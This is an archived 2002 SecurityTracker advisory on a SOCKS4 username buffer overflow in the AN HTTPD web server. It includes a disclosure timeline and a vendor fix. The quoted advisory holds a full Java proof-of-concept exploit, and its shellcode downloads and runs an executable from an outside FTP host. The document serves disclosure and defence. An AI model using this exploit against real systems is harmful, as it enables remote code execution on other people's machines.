SecurityTracker.com Archives - AN HTTPD Buffer Overflow in Processing SOCKS4 Requests Allows Remote Code Execution

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Web Server/CGI) > AN HTTP Server

Vendors: nakata@st.rim.or.jp

AN HTTPD Buffer Overflow in Processing SOCKS4 Requests Allows Remote Code Execution

SecurityTracker Alert ID: 1005457

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Oct 21 2002

Impact: Execution of arbitrary code via network, User access via network

Fix Available: Yes Exploit Included: Yes Vendor Confirmed: Yes

Version(s): 1.30 to 1.41c

Description: A vulnerability was reported in the AN HTTP Server web server for Microsoft Windows platforms. A remote user can execute arbitrary code on the system.

It is reported that a remote user can send a SOCKS4 request containing a long username to the server to trigger a buffer overflow and execute arbitrary code on the target host.

A demonstration exploit is provided in the Source Message.

Impact: A remote user can execute arbitrary code on the server with the privileges of the web server process.

Solution: The vendor has released a fixed version (1.41d), available at:

http://www.st.rim.or.jp/~nakata/
http://www.st.rim.or.jp/~nakata/httpd141d.exe

Vendor URL: www.st.rim.or.jp/~nakata/ (Links to External Site)

Cause: Boundary error

Underlying OS: Windows (Any)

Reported By: Kanatoko <anvil@jumperz.net>

Message History: None.

Source Message Contents

Date: Mon, 21 Oct 2002 01:38:15 +0900
From: Kanatoko <anvil@jumperz.net>
Subject: AN HTTPD SOCKS4 username Buffer Overflow Vulnerability

 


Advisory Information
--------------------
Name                   : AN HTTPD
Vendor Homepage        : http://www.st.rim.or.jp/~nakata/
Platforms              : Windows9x/Me/NT/2000/XP
Vulnerability Type     : stack overflow( very easy to exploit )
Vendor Contacted       : 17/10/2002
Vendor Replied         : 20/10/2002
Vulnerable Versions    : 1.30 to 1.41c
Non affected version   : 1.41d


Description
--------------------
AN HTTPD is a Japanese multi purpose server software.
It can work as a SOCKS4 server.

We found an exploitable buffer overflow problem in AN HTTPD Version 1.41c.
Sending a SOCKS4 request with long username cause a buffer overflow. This
vulnerability allows a remote attacker to execute arbitary code on the 
 target host.


Proof of Concept
----------------
anhttpd141c_exploit.java

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <anvil@jumperz.net>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
 
private static final int SOCKS_PORT	= 1080;

private String targetHost;
//----------------------------------------------------------------------------
public static void main( String[] args )
throws Exception
 
if( args.length != 1 )
	{
	System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
	return;
	}
anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
instance.doIt();
 
//----------------------------------------------------------------------------
public anhttpd141c_exploit( String IN_targetHost )
throws Exception
 
targetHost	= IN_targetHost;
 
//----------------------------------------------------------------------------
private void doIt()
throws Exception
 
Socket socket	= new Socket( targetHost, SOCKS_PORT );
OutputStream os	= socket.getOutputStream();

byte[] socks4_request = {
(byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
};

	// egg: download and start installing Netscape4.79 :)
	// http://www.jumperz.net/egg_netscape.cpp
byte[] egg = {
(byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90, 
(byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88, 
(byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88, 
(byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68, 
(byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B, 
(byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02, 
(byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, 
(byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01, 
(byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9, 
(byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94, 
(byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF, 
(byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69, 
(byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74, 
(byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F, 
(byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74, 
(byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69, 
(byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F, 
(byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39, 
(byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65, 
(byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C, 
(byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37, 
(byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75, 
(byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65, 
(byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20, 
(byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E, 
(byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E, 
(byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, 
(byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, 
(byte)0x58
};

byte[] jmp_esp = {
(byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
};

os.write( socks4_request );

	//where is memset? :0
for( int i = 0; i < 1020; ++i )
	{
	os.write( (byte)0x41 );
	}

os.write( jmp_esp );
os.write( egg );
os.write( (byte)0x00 );
 
//----------------------------------------------------------------------------
 

-- 
Kanatoko  <anvil@jumperz.net>
JUMPERZ.NET : http://www.jumperz.net/(Japanese)

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC